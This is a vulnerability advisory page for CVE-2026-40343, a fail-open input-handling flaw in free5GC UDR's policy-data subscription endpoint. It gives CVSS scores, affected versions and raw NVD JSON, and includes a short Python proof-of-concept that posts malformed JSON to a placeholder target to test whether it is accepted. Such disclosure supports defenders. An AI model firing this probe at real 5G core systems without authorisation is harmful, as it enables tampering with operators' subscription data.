Security Vulnerability Report
中文
CVE-2026-40343 CVSS 5.8 MEDIUM

CVE-2026-40343

Published: 2026-04-22 00:16:28
Last Modified: 2026-04-23 19:44:40
Source: [email protected]

Description

free5GC UDR is the user data repository (UDR) for free5GC, an an open-source project for 5th generation (5G) mobile core networks. In versions up to and including 1.4.2, a fail-open request handling flaw in the UDR service causes the `/nudr-dr/v2/policy-data/subs-to-notify` POST handler to continue processing requests even after request body retrieval or deserialization errors. This may allow unintended creation of Policy Data notification subscriptions with invalid, empty, or partially processed input, depending on downstream processor behavior. As of time of publication, a patched version is not available.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:free5gc:free5gc:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:free5gc:udr:*:*:*:*:*:go:*:* - VULNERABLE
free5GC UDR <= 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-40343: free5GC UDR Fail-Open import requests import json target_url = "http://target-ip:port/nudr-dr/v2/policy-data/subs-to-notify" # Malformed JSON to trigger deserialization error or invalid body malformed_payload = { "invalid": "data", # Missing required fields to trigger logic flaw } headers = { "Content-Type": "application/json" } try: # Sending the request response = requests.post(target_url, data=json.dumps(malformed_payload), headers=headers) if response.status_code == 200 or response.status_code == 201: print("[+] Potential Vulnerability Detected! Request accepted despite invalid input.") else: print(f"[-] Status Code: {response.status_code}") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40343", "sourceIdentifier": "[email protected]", "published": "2026-04-22T00:16:27.670", "lastModified": "2026-04-23T19:44:39.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "free5GC UDR is the user data repository (UDR) for free5GC, an an open-source project for 5th generation (5G) mobile core networks. In versions up to and including 1.4.2, a fail-open request handling flaw in the UDR service causes the `/nudr-dr/v2/policy-data/subs-to-notify` POST handler to continue processing requests even after request body retrieval or deserialization errors. This may allow unintended creation of Policy Data notification subscriptions with invalid, empty, or partially processed input, depending on downstream processor behavior. As of time of publication, a patched version is not available."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.2.1", "matchCriteriaId": "AA20AB40-343A-4B48-9B29-2A700DEC58B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:udr:*:*:*:*:*:go:*:*", "versionEndIncluding": "1.4.2", "matchCriteriaId": "0D45904F-F7CA-47A1-A1E3-D23FCE2D7878"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jwch-w7wh-gqjm", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.